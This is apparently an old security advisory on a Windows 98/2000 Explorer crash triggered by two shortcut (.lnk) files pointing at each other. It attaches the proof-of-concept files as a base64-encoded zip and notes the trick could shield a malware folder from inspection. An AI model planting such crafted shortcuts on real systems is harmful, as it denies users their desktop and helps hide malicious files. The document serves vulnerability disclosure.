|
COMMAND Windows explorer DoS with cross-referenced shortcuts (link(a) <-> link(b)) SYSTEMS AFFECTED Tested With: Windows 98, Windows 2000 Server PROBLEM S.G.Masood [sgmasood@yahoo.com] found : There is a problem with the way Windows (tested with Win98 and Win2k Server) handles shortcut (.lnk) files. A specially crafted shortcut will crash explorer.exe/shell32.dll. A shortcut, say, A.lnk is created and it is made to point to another shortcut B.lnk. Then, B.lnk is made to point to A.lnk. Now when the folder containing these two files is viewed or accessed in any way, explorer crashes. (Note that Windows won't allow the creation of .lnk files in the above format. A hex editor can be used to change the location of the .lnk files. A zip file containing examples for Win98 has been attached) As an effect, a malicious user/program can hide malware in a folder containing these .lnk files to prevent users/programs from investigating the contents of the folder. This vulnerability is most damaging when the shortcuts are placed on the desktop. This could prevent many clueless users from using their computer. --snap-- --0-2099707853-1047734379=:38066 Content-Type: application/x-zip-compressed; name="test.zip" Content-Transfer-Encoding: base64 Content-Description: test.zip Content-Disposition: attachment; filename="test.zip" UEsDBBQAAAAIAFcibC5Lkat2pgAAAAUBAAAKAAAAdGVzdC9hLmxua/NhYGBg FGFiAIEDYJLBTRpIKID4tqulFV4cYmRoibX88xxIO1+WAfOhAM6AgkQGEQZ5 /gf+FxReWWUKLLrBwaBtYDBXkkHZ2SqGAR0YtkgwGIJZ2XoXtgowlKQWlzCE uAaHMEgxGEHFb29VYEjSy8nLhpIMDA5ALMMAsRpEG0INswcSokDMDMS3OYvk BIB0kGOUJwPQapDJMVAD2Bn0IEx2mAzIVQBQSwMEFAAAAAgAZiJsLgcknDqp AAAABQEAAAoAAAB0ZXN0L2IubG5r82FgYGAUYWIAgQNgksFNGkgogPi2q6UV XhxiZGiJtfzzHEg7X5YB86EAzoCCRAYRBnn+B/4XFF5ZZQosusHBoG1gMFeS QdnZKoYBHRi2SDAYglnZehe2CjCUpBaXMIS4BocwSDEYQcVvb1VgSNTLyctm cASTDAwOQCzDALEaRBtCDbMHEqJAzAzEtzmL5ASAdJBjlCcD0GqQyTEQYxjY GfQgTHaYDMhVAFBLAwQKAAAAAACRImwuTrd9xEIAAABCAAAADwAAAHRlc3Qv cmVhZG1lLnR4dDEuIFVuemlwIHRvIEM6XA0KMi4gT3BlbiB0aGUgZm9sZGVy IGM6XHRlc3QNCg0KVGVzdGVkIHdpdGggV2luOTgNClBLAwQKAAAAAAAQImwu AAAAAAAAAAAAAAAABQAAAHRlc3QvUEsBAhQAFAAAAAgAVyJsLkuRq3amAAAA BQEAAAoAAAAAAAAAAAAgALaBAAAAAHRlc3QvYS5sbmtQSwECFAAUAAAACABm ImwuByScOqkAAAAFAQAACgAAAAAAAAAAACAAtoHOAAAAdGVzdC9iLmxua1BL AQIUAAoAAAAAAJEibC5Ot33EQgAAAEIAAAAPAAAAAAAAAAEAIAC2gZ8BAAB0 ZXN0L3JlYWRtZS50eHRQSwECFAAKAAAAAAAQImwuAAAAAAAAAAAAAAAABQAA AAAAAAAAABAA/0EOAgAAdGVzdC9QSwUGAAAAAAQABADgAAAAMQIAAAAA --0-2099707853-1047734379=:38066-- SOLUTION No patch is availaible from the vendor. The shortcuts can be safely deleted from the commandline.